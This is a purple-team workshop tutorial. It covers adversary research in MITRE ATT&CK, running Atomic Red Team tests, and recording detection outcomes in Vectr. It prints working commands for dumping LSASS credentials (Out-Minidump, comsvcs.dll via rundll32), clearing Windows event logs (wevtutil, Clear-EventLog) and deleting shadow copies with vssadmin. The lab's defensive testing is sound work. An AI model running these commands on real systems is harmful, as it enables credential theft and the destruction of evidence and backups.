Lab 1
Threat Intelligence
The first step to emulating an adversary is to identify and understand that adversary. As Sun Tzu famously wrote in The Art of War: “If you know the enemy and know yourself, you need not fear the result of a hundred battles.” This lab covers the “know the enemy” part.
In this lab, we will dive into understanding how to recognize and analyze the Tactics, Techniques, and Procedures (TTPs) used by Advanced Persistent Threats (APTs). As cyber threats become more sophisticated, it's essential for security professionals to not only detect attacks but also understand the methods adversaries use to infiltrate and navigate systems.
By the end of the lab, you should be able to do the following:
- Identify an Adversary relevant to your organization
- Recognize the Tactics, Techniques, and Procedures (TTPs) utilized by the adversary
- Utilize MITRE ATT&CK Navigator to map attack chains per APT
The purpose of Cyber Threat Intelligence (CTI) is to identify adversaries known to attack organizations similar to your own, whether by the location of your company’s headquarters or by its industry. These are the threat actors most likely to attack your organization. Try to find an APT known to target your industry and the region where your company is headquartered, and take note of that APT for later.
Scroll down to see the “Techniques Used” for this threat actor.
Here you can see all the techniques that APT28 has been known to use against other organizations.
MITRE has a great, open-source application called “MITRE ATT&CK Navigator” to help visualize the known TTPs of Threat Actors in their database.
Now that we have created a Layer with APT28, consider your organization.
Industry
Finance
Critical Infrastructure
Healthcare
Government
Etc.
Country or Region
USA based organization
Foreign based organization
Which countries are considered adversaries of the country where the organization is based?
Note any overlap in the Techniques used, as well as any differences. These Tactics, Techniques, and Procedures (TTPs) are what we emulate in order to understand what our adversary is likely to do when attacking our organization. By emulating these TTPs we can test our defenses and find our visibility gaps. As you mature as a hacker, you slowly develop what is often referred to as a “methodology”: the steps you take when enumerating machines, the tools you become comfortable with and gravitate toward, the paths you take to dump credentials or move laterally, and so on. You will develop a “fingerprint” of your own in the same way any Threat Actor does. That is essentially what TTPs are: the fingerprint of a Threat Actor, and it is typically how Threat Actors are identified and categorized post-breach.
Lab 2
Atomic Red Team Framework
This lab will go over Red Canary’s Atomic Red Team Framework. Atomic Red Team is a library of techniques, scripts, and test-case execution automation, all mapped to MITRE ATT&CK Technique numbers. The tests built for each Technique are referred to as “atomics,” which makes it easy to cross-reference MITRE ATT&CK CTI Threat Actors and their Techniques with Atomic Red Team’s atomics.
By the end of this lab you should be able to do the following:
- Navigate Atomic Red Team’s Library of atomics
- Cross-reference a MITRE ATT&CK Technique number with its corresponding Atomic Red Team atomic
- Execute test cases based on atomics
Scroll to “Projects” and click on “ATOMIC RED TEAM”
This is the library of Techniques, Test Cases for the Techniques, and how to execute them. Red Canary labels these tests as “Atomics”. There are often many Atomics per technique and sub-technique allowing for a wide variety of ways to test any given technique or situation. You can search for the MITRE ATT&CK Technique number in the search bar to find a specific Atomic matching that technique.
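Under the hood, each atomic is defined in a YAML file keyed by its Technique number. A minimal sketch of that layout is shown below; the field names follow the Atomic Red Team format, but the specific test shown here is illustrative rather than copied from the library:

```yaml
# Sketch of an Atomic Red Team atomic definition (illustrative test content)
attack_technique: T1059.003
display_name: "Command and Scripting Interpreter: Windows Command Shell"
atomic_tests:
  - name: Example atomic test
    description: |
      Launches calc.exe through cmd.exe to exercise the technique.
    supported_platforms:
      - windows
    executor:
      name: command_prompt
      command: |
        calc.exe
      cleanup_command: |
        taskkill /im calc.exe /f
```

Each `atomic_tests` entry pairs an executor (command prompt, PowerShell, bash, etc.) with the commands to run and, optionally, cleanup commands to undo the test.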
Inside of this are all the Atomics stored locally inside of the VM. We will demonstrate how to utilize these Atomics in this lab.
Here you will see Atomic Red Team’s explanation of the technique. In this case, it is “Command and Scripting Interpreter: Windows Command Shell.”
Atomic Red Team has features that allow for automation of test case execution. We will not be going over the automation portion of Atomic Red Team in this workshop, we will be executing test cases manually.
Inside this folder you will see one “Windows Command Script” file. Right-click and edit this file:
This is a very basic script: it simply calls Command Prompt to execute the binary calc.exe. While calc.exe is not malicious, executing a binary in this roundabout way is suspicious, and Threat Actors have been known to do this during their attack chains. Malicious executables that bypass AV/EDR can be built in a few minutes (ask me how I know), so we want to detect this type of suspicious behavior rather than the executable itself.
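The body of such a script is likely just a one-liner along these lines (a sketch, not necessarily the exact file contents):

```batch
REM Sketch: invoke cmd.exe to launch calc.exe from System32
%SystemRoot%\System32\cmd.exe /c %SystemRoot%\System32\calc.exe
```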
Command prompt should have opened and then executed the command to launch calc.exe from system32:
Now we will use another technique that is meant to dump memory from the Local Security Authority Subsystem Service (LSASS). By dumping the memory of the LSASS process, we can extract the cached passwords of users who have logged into the machine. This technique relates specifically to the dump itself, so we won’t go beyond that.
cd 'C:\users\hacker\Desktop\Atomic Red Team\atomics\T1003.001\src'
Import-Module .\Out-Minidump.ps1
get-process lsass
get-process lsass | Out-Minidump
If this works and is not blocked, it will create a file called lsass_[Id Number].dmp in the same folder as the Out-Minidump.ps1 file:
This .dmp file holds credential information because we took a snapshot of the portion of the memory that LSASS was using. Another way we can do the same thing is to dump it from Task Manager directly.
This will effectively do the same thing: create a memory dump of LSASS that can be pulled off the machine and mined for credentials offline. Windows Defender Antivirus may have triggered on either of these techniques.
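Beyond Out-Minidump and Task Manager, another common variant of T1003.001 uses the MiniDump export of the built-in comsvcs.dll. A sketch, assuming an elevated PowerShell session and that C:\Temp exists:

```powershell
# Look up the LSASS process ID, then have comsvcs.dll write a full minidump of it
$lsassId = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassId C:\Temp\lsass.dmp full
```

Like the other two methods, this produces a .dmp file that credentials can later be extracted from, and it is well known to AV/EDR products.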
For our next technique we’ll be destroying evidence of our wrongdoing, but before we destroy the logs let’s take a look at Event Viewer.
Here you will see the 4 main categories of Windows Logs:
Application – Logs relating to applications such as Microsoft Edge, Windows Management Instrumentation, the .NET Runtime, etc.
Security – Logs relating to authentication, file permissions, logons, etc.
Setup – Logs relating to installation, upgrades, and other OS related setup information
System – Logs related to Windows System Components, Drivers, and other critical Windows functions
By default, Windows sends most logs here. Your organization can customize other items to be sent here and may also forward these logs to a centralized Security Information and Event Management (SIEM) server. Incident Responders and Threat Hunters use logs like these to aid their investigations, which is why Threat Actors often clear them to cover their tracks. Because this is suspicious behavior, we want to test whether we have alerting set up for this situation.
Here you can see the explanation of how this technique is done:
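For reference, the core of this technique (T1070.001) typically comes down to a few built-in commands like the following (a sketch; clearing logs requires an elevated prompt):

```powershell
# Clear the main Windows Event Logs with the built-in wevtutil utility
wevtutil cl Application
wevtutil cl Security
wevtutil cl System

# Equivalent Windows PowerShell cmdlet
Clear-EventLog -LogName Application, Security, System
```

Clearing the Security log in particular generates its own event (the log records that it was cleared), which is one of the artifacts defenders can alert on.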
These are just three examples of common techniques that are executed by Threat Actors. As you can see, Red Canary’s Atomic Red Team Framework spells out how to execute these Techniques in a way that is easy to follow. The Techniques we used in this lab are some of the easier ones to execute. These do get more complicated, but as you continue to do these, you will learn as you go and become more comfortable with the more complicated Techniques. As you execute future test cases, don’t just copy and paste commands or execute pre-built binaries in Atomic Red Team. Open up scripts, read through them, do the necessary research to actually understand what is happening and how it works before you execute.
Lab 3
Purple Team Organization and Execution
The other half of the equation is knowing your own organization’s strengths and weaknesses during any phase of an adversary’s chain of attacks. With this information you can understand where to prioritize remediation and fortification of defenses.
By the end of the lab, you should be able to do the following:
- Create a new Purple Team Assessment in Vectr
- Create a new Campaign within the Purple Team assessment
- Document test case results
- Generate reporting and trend metrics for stakeholders
This .yml file is the newest Threat Simulation Index from Security Risk Advisors (SRA). This contains the most recent index (at the time of the Lab’s creation). These are the most common techniques used by 24 active Threat Actors. This index is curated by SRA and updated periodically.
Here you will see the MITRE ATT&CK matrix for the index that was just imported. As you complete test cases and take note of the results, these cells will be color coded based on how strong or weak your organization’s detection/blocking capabilities are for any given test case.
Now that we have created an Assessment, we will create a campaign inside of the assessment. A campaign is a smaller subset of an existing assessment to test against a more specific group of test cases, for example a campaign for AWS or Azure specifically. You could also create a campaign for one particular Threat Actor in an assessment with many Threat Actors. There are many ways you can utilize campaigns within an assessment.
Filter to select relevant TTPs (see next).
TTPs for Documentation:
T1490 – HI – Delete Shadows with vssadmin
T1070.001 – TSI - Clear Windows Event Log entries
T1003.001 – TSI – Dump LSASS memory using Task Manager
T1056 – HI - Keylogger
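For context, the first of these (T1490 – Delete Shadows with vssadmin) typically boils down to a single built-in command that deletes Volume Shadow Copies, removing the local restore points a victim might otherwise recover from (a sketch; requires an elevated prompt):

```batch
vssadmin.exe delete shadows /all /quiet
```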
You will now see the Purple Team Workshop campaign created under the TSI – Threat Simulation Index in the MITRE ATT&CK Alignment page:
This page is where all of the information for the test case resides. This keeps track of the Status of the test case, the Attack Timeline, the Name and Description of the test, the Operators Guidance, Detection Time, Outcome Notes, and Detection/Prevention guidance, as well as any evidence files such as screenshots of alerts or logs. It is a very well-organized means of tracking these test cases. We will simulate the test case outcome.
You will see the Test Case outcome at the top right switch to “Success” and Test Case Outcome will show the “Alerted – Medium” outcome that we selected in the dropdown.
You will see the “Clear Windows Event Logs” test case turned green. This is an indication that the organization has passed this test case.
This will cause the Keylogging test case to turn green. You will also see that the Keylogging test case exists in two columns (two Tactics, or phases). This is because a keylogger can be used both for Credential Access and for Collection of data or other information a threat actor may want to gather. Note that some test cases may appear under more than one Tactic, but each is still the same single test case when opened.
The LSASS Memory test case turned red due to this being a completely failed test case.
This test case turned orange. It is still a failure, but not as bad as no logging at all: some artifacts of the technique were left behind, whereas the red LSASS Memory result indicates the organization was completely blind to that technique.
To visualize what a fully completed heat map would look like, we will navigate to a demo index that is pre-populated with results.
Here you should see the heat map of a completed assessment. The heat map gives an easy means of visualizing the phases of a Threat Actor’s attack chain where we have strong defenses, and which phases need work.
The idea behind all of this is to allow Incident Response a fighting chance at detecting and eradicating a threat before they are able to complete their objective. The more test cases you alert or block on, the better those chances become.
After an Assessment is completed, the next step is to generate reports that can be disseminated to stakeholders.
Here you can see the results of a completed assessment. The selected assessment had 52 test cases and passed 50% of them. For the test cases in this assessment, 50% of them were either blocked and/or alerted, while the other 50% were only logged or had no artifacts at all.
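The arithmetic behind these summary numbers is straightforward; a small sketch of how such a pass rate and outcome distribution could be tallied (the outcome labels and counts here are illustrative, not Vectr’s exact schema):

```python
from collections import Counter

# Hypothetical outcomes for a 52-test-case assessment; "Blocked" and
# "Alerted" count as passes, "Logged" and "No Evidence" as failures.
outcomes = (["Blocked"] * 12 + ["Alerted"] * 14 +
            ["Logged"] * 16 + ["No Evidence"] * 10)

counts = Counter(outcomes)
passed = counts["Blocked"] + counts["Alerted"]
pass_rate = passed / len(outcomes)

print(dict(counts))
print(f"{len(outcomes)} test cases, {pass_rate:.0%} passed")
# → 52 test cases, 50% passed
```

Vectr computes and charts these breakdowns for you; the sketch just shows where figures like “52 test cases, 50% passed” come from.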
Scroll down and view the other charts. These are all breakdowns of Phases/Tactics along with the outcomes of the testing. There are several ways this data can be organized and reported upon. The idea is to show progression as you work with the Blue Team to build logs, alerts, and blocks as necessary to improve your resilience to the Threat Actor(s) you test against.
Here you can see the breakdown of the individual phases within the attack, in pie chart form.
As you periodically test your environment against particular indices, and have the Blue Team remediate failed test cases, you will generate a resilience trendline that provides feedback to leadership that the program is generating value. This trendline represents the improvement in your organization’s resilience to attacks from your adversaries.
This page provides breakdowns of the testing results: outcome distribution and counts, which layers of your defense-in-depth are doing most of the heavy lifting, which phases of the attack chain you are strongest or weakest in, and your most and least successful campaigns, phases, and techniques.
This data and these charts can be manipulated to fit the needs of your reporting or how stakeholders may want to ingest this information. Vectr provides a wide variety of reporting methods based on the results of your testing. This is often updated in new versions of Vectr.